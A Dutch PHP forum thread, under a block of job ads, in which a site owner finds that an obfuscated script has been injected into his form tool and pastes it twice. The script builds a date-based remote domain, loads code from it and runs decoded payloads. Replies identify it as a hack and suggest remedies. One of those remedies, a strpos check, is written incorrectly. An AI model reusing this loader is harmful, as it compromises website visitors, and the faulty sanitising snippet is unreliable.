syntax error

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

(Junior) PHP Ontwikkelaar bij een retail bedrijf i

Bedrijfsomschrijving Ben jij een ervaren PHP ontwikkelaar met een passie voor retail en ICT? Wil jij werken in een team dat zich bezighoudt met het ontwikkelen van uitdagende applicaties voor een groot retailbedrijf in Delft? Dan zijn zij op zoek naar jou! Functieomschrijving Als PHP Ontwikkelaar werk je in een team aan de ontwikkeling van applicaties die door de gehele organisatie worden gebruikt. Je bent verantwoordelijk voor het ontwikkelen, testen en implementeren van deze applicaties. Je werkt hierbij nauw samen met andere ontwikkelaars, projectmanagers en stakeholders binnen de organisatie. Je taken bestaan onder andere uit: Ontwikkelen van nieuwe functionaliteiten en

Bekijk vacature »

Front end ontwikkelaar

Functie Het huidige team bestaat uit momenteel uit 5 back end developers verdeeld van senior tot junior. Omdat de gehele front end van applicaties anders gaan insteken zijn ze op zoek naar een ervaren Front end developer die hen kan helpen de juiste keuzes te maken. Je krijgt veel vrijheid om te bepalen hoe je dit wilt ontwikkelen en vrijheid in welke techniek je hiervoor wilt gebruiken. Je zult je dus bezighouden met architectuur, documentatie en natuurlijk ontwikkeling van nieuwe functionaliteiten binnen de verschillende applicaties. natuurlijk heb jij ook mogelijkheden om te sparren binnen het team, maar ze gaan uit

Bekijk vacature »

C# .NET Developer

Dit ga je doen Als developer nieuwe gave features implementeren; Werken met technieken als C# .NET en (REST) API's webservices; Ontwikkelen van koppelingen middels API's; Maken van technische keuzes en beslissingen over de architectuur; Junior collega's coachen; Initiatief nemen voor nieuwe technische mogelijkheden; Je bent een belangrijke schakel - en vindt het leuk - om te schakelen met de business. Hier ga je werken In een klein team van professionals ben je als C# .NET Developer verantwoordelijk voor het ontwikkelen van één van de applicaties voor het grootste inhouse product: een applicatie voor alles omtrent hypotheken. De programmeertaal die je

Bekijk vacature »

Delphi Programmeur

Functie omschrijving Onze opdrachtgever is gespecialiseerd in kantoor-bedrijfssoftware en zit gevestigd in omgeving Numansdorp. Als programmeur ben jij bij dit bedrijf met het volgende bezig; Je vertaalt technische en functionele ontwerpen naar kwalitatieve software. Je ontwikkelt, ontwerpt en test software. Je maakt daarbij veel gebruik met de volgende tools & technologieën: Delphi 10.3 (Rio), QuickReport 6. Je krijgt in deze rol veel vrijheid en verantwoordelijkheid. Je levert projecten van A - Z op, en werkt daarbij projectmatig en gestructureerd. Bedrijfsprofiel Dit bedrijf richt zich op maatwerk software oplossingen. Deze software oplossingen worden ingezet in de financiële branche. Het betreft een

Bekijk vacature »

Senior Front-end Developer

Dit ga je doen Met behulp van diverse programmeertalen ontwikkelen van Front-end software; Het begeleiden van het front-end team; Het oplossen van incidenten; Het bijhouden van een backlog; Je hebt een actieve bijdrage in de wekelijkse overleggen met de omliggende teams; Je houdt trends bij en adviseert het management hierover waar nodig; Helder communiceren met de stakeholders om hen zo mee te nemen in projecten en laten inzien wat de duur en toegevoegde waarde van bepaalde projecten is. Hier ga je werken Deze organisatie heeft circa 40 miljoen bezoekers per maand en heeft innovatie hoog in het vaandel staan. Het

Bekijk vacature »

Experienced Lead Java Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Delft Vacature ID: 13301 Introductie We are seeking a Lead Java Developer for our team in the area of Delft. You will develop an application used exclusively by the engineers and geologists for site characterizations, which imports raw field and laboratory measurements for further processing, integration, ground modelling, and geotechnical analysis and reporting. The client/server application is entirely written in Java, and the server is hosted in the Amazon cloud, utilizing frameworks such as Spring and Hibernate, and connected to an MS SQL Server RDS instance. There is a trend towards using more

Bekijk vacature »

IT Infrastructuur Developer

IT Infrastructuur Developer Ben jij (bijna) klaar met je HBO studie in de richting van IT? Opzoek naar een spannende eerste baan, waar je ontzettend veel kan leren? Dan hebben wij de ultieme job voor jou! Voor een goede klant van ons in de financiële dienstverlening zijn wij opzoek naar een Junior Infrastructure Developer. Deze baan is een mooie kans om een sterke start te geven aan jouw carrière binnen de IT! De job Je werkt nauw samen met het Devops team, en zal je voornamelijk bezighouden met het automatiseren van infrastructure componenten. De componenten worden opgevraagd door het DevOps

Bekijk vacature »

Java Developer

Functie Wat ga je doen als Java developer? Jij komt terecht binnen een informeel team waarin je verantwoordelijk bent voor de backend systemen voor grote klanten als Ziggo en KPN. Als Medior Java developer werk je in teamverband en soms individueel. Gedurende de werkweek zal je veelvuldig sparren met je collega’s voor een goede implementatie van de software. Ben jij een echte Java developer? Ben je geïnteresseerd in de nieuwste technieken en de laatste ontwikkelingen? Dan ben je hier aan het juiste adres! Eisen Wat wordt er van jou verwacht? • Minimaal HBO/WO denk- en werkniveau; • Analytisch sterk, open

Bekijk vacature »

Senior java ontwikkelaar integratie

Functieomschrijving Voor de gemeente Rotterdam zijn wij op zoek naar een senior java ontwikkelaar integratie. Taken Binnen een zelfsturend Scrumteam voer je geheel zelfstanding je opdrachten uit en levert het eindresultaat op aan het Integratieteam. Jij voelt je net als alle teamleden verantwoordelijk voor alle aspecten, vanaf de vraag tot en met de oplevering in productie. Je bent kritisch, je helpt de klant om zijn wensen helder te krijgen, je schrijft zelfstandig clean code die van hoge kwaliteit is, met bijbehorende unit- en integratietesten, je ondersteunt zo nodig bij deployments naar productie. Het Integratieteam bouwt componenten (Endpoints) op de ESB.

Bekijk vacature »

Database Developer

Functieomschrijving Wat ga je doen? Als developer ben jij samen met een gemotiveerd team van 10 collega’s verantwoordelijk voor het creëren van aangemeten software voor klanten. Je bent klantvriendelijk en oplossingsgericht ingesteld, omdat het essentieel is om de klanten zo goed mogelijk te helpen met hun uitdagingen. Het is mogelijk om vanuit huis je werkzaamheden uit te voeren, maar het is ook prettig als je in de omgeving van Tilburg woont om naar het kantoor te kunnen komen. Vind jij het leuk om jouw creatieve vaardigheden te benutten om complexe systemen te ontwikkelen? Lees dan snel verder! Bedrijfsprofiel Voor wie

Bekijk vacature »

Front-end developer (Medior/Senior)

Functie Het front-end team bestaat momenteel uit 4 collega’s en is hard aan het groeien! Samen leveren jullie een essentiële bijdrage aan de applicaties die ze voor hun klanten realiseren. Je werkt in het front-end team samen met de back-end teams en product owners om te zorgen dat de applicaties een fijne gebruikerservaring opleveren. Jouw expertise zorgt ervoor dat de juiste keuzes gemaakt worden qua techniek en ontwerp, van back-end tot aan gebruiker. In samenspraak met je team bepalen jullie de beste keuze voor techniek. Ook is er altijd ruimte om nieuwe technieken te ontdekken. Eisen • Je hebt gedegen

Bekijk vacature »

PHP Developer

Dit ga je doen Je werkt nauw samen met het websitebureau aan de ontwikkeling en optimalisering van het internationale platform; Je ziet nieuwe webshops op en voert optimalisaties door; Je bouwt aan technische, functioneel en commercial resultaat; Je vindt het leuk om zelfstandig binnen een internationale organisatie te werken, maar krijgt ook energie om samen met collega's te werken. Hier ga je werken Voor een bedrijf in de regio Rotterdam zijn wij opzoek naar een PHP Developer. Je wordt onderdeel van het communicatieteam en gaat je bezighouden met het optimaliseren van de website van dit internationale bedrijf. Je schakelt veel

Bekijk vacature »

PHP developer

Functie omschrijving Voor een klein bedrijf in de buurt van Nieuwegein zijn wij per direct op zoek naar een talentvolle PHP developer. Er wordt veel ruimte geboden voor eigen initiateven, waardoor je een mooie stempel kan drukken op jouw eigen werkzaamheden (zowel operationeel als strategisch). Het bedrijf heeft middels externe programmeurs een multimedia platform ontwikkeld, maar willen geleidelijk de ontwikkeling naar binnen halen. Om die reden zoeken zij een communicatieve interne PHP developer die graag meebouwt aan het succesvolle product. Je gaat de volgende werkzaamheden verrichten: Platform beheren en programmeren (PHP, MySQL, JQuery, Javascript, XML & HTML); Communicatie en aansturing

Bekijk vacature »

Software Ontwikkelaar

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Developer Full Stack

Functie omschrijving Developer gezocht! Ben jij een enthousiaste developer die graag wil bijdragen aan ontwikkelingen binnen een mooie organisatie? Solliciteer dan snel. Wij zijn op zoek naar een Full Stack Developer uit de regio Nijkerk die gaat bijdragen aan het door ontwikkelen, onderhouden en optimaliseren van een SaaS applicatie. Je moet beschikken over beheersing van zowel de Nederlandse als Engelse taal aangezien je samen met de klant gaat werken. Bedrijfsprofiel Je komt te werken binnen een echt familiebedrijf dat al sinds 1925 actief is binnen de FMCG branche. Het bedrijf heeft 40 medewerkers en er heerst een platte communicatiestructuur waarbij

Bekijk vacature »
Eric O

Eric O

15/05/2014 15:04:00
Quote Anchor link
Dag allemaal,

er is iets raars gebeurd op mijn webserver (hacking?)
als ik een formulier verstuur, maak ik gebruik van een php tool. Dat werkte tot 3 dagen geleden perfect.
ALs ik nu echter op de knop verstuur klik, verschint de volgende melding:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/o5148okp/public_html/phpforms/index.php on line 525

Ik ben gaan zien op de pagina naar lijn 525, maar voor mij is dit hocus pocus. Wie ziet de fout??
Bedankt voor jullie hulp!



<body><script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
&nbsp;<br><br>
<blockquote>
<h2 style='color: red;'>There appears to be a system error.</h2>
You can try to refresh the page by clicking
<a href=\"javascript:window.location=window.location;\">here</a>.
 
PHP hulp

PHP hulp

16/04/2024 19:39:05
 
- Ariën  -
Beheerder

- Ariën -

15/05/2014 15:13:24
Quote Anchor link
Ik gok dat die JavaScript geïnjecteerd in in je PHP-code, waarmee je PHP-code-systax niet meer klopt.
Kan je geen backup terug zetten waarna je uit kan zoeken hoe het lek misbruikt is?
Gewijzigd op 15/05/2014 15:14:39 door - Ariën -
 
Ivo P

Ivo P

15/05/2014 15:13:47
Quote Anchor link
is dit een stuk uit je script dat je kent / dat daar hoort te staan?

maw: is dit jouw script, of heeft iemand daar in lopen knoeien?

Het is namelijk op z'n minst een ondoorzichtig stuk code dat iets probeert te doen me een toe te voegen stuk javascript, waarbij een externe url betrokken is (waarbij de domainnaam afhankelijk is van de datum?)

Zeker als dit voor jou onverwacht optreedt, dan zou ik denken aan een "hacker" / "scriptkiddie"

wanneer is de file voor het laatst gewijzigd?
IS hij gelijk aan je backup?
 
Eric O

Eric O

15/05/2014 15:36:29
Quote Anchor link
ik heb mijn service provide gevraagd een back up terug tezetten van 3 dagen geleden toen het wel nog werkte, maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven. Helaas. Ik vrees dat ik de tool opnieuw moet installeren.
 
Michael -

Michael -

15/05/2014 15:39:29
Quote Anchor link
> maar ze hebben vannacht een nieuwe back up gestart, die oude is dus overschreven.

Hé? Vreemde provider om maar één backup te maken in de zoveel dagen of ligt dat aan mij? Op m'n werk wordt er elke nacht een backup gemaakt en zijn er altijd 7 beschikbaar (rest op tape) dus je kan makkelijk een week terug. Dacht dat dat vrij normaal was.

Je hebt de bestanden ook niet lokaal op je pc opgeslagen? Of werk je altijd online. Dat eerste is sowieso aan te raden.
Gewijzigd op 15/05/2014 16:02:51 door Michael -
 
Eric O

Eric O

15/05/2014 20:34:22
Quote Anchor link
Ik heb het volledige script nu verwijderd en bij een formulier werkt het terug. Bij een ander formiulier worden de gegevens ook verstuurd , maar wordt ik nog niet doorgestuurd naar de pagina die ik heb ingesteld, die moet verschijnen als het form verstuurd wordt.
Ik zoek verder vanavond.

Toevoeging op 15/05/2014 21:01:02:

Ik heb mijn cache vd browser nog eens geledigd en een paar testen gedaan. Alle formulieren werken terug zoals het moet na verwijdering van het script: Heb mijn ftp paswoorden gewijzigd. Ik vraag me toch af hoe dat script erop is gekomen..tja..

onderstaand script was dus de boosdoener..


<script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/\0+/,'');document.body.appendChild(s);};runonload(); </script>
 
Ger van Steenderen
Tutorial mod

Ger van Steenderen

15/05/2014 21:33:51
Quote Anchor link
Heb je ergens iets waar html code ingevoerd kan worden?
Gebruik dan striptags()
Waarbij tussen de haakjes een comma gescheiden string kunt opgeven voor de tags die genegeerd moeten worden:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
$sanitized
= strip_tags($textarea, '<p><br>');
?>

Of detect and react:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
<?php
if (strpos('<script', $textarea) !== false) {
    header('Location: www.idiots.com');
}

?>
Gewijzigd op 15/05/2014 21:39:51 door Ger van Steenderen
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.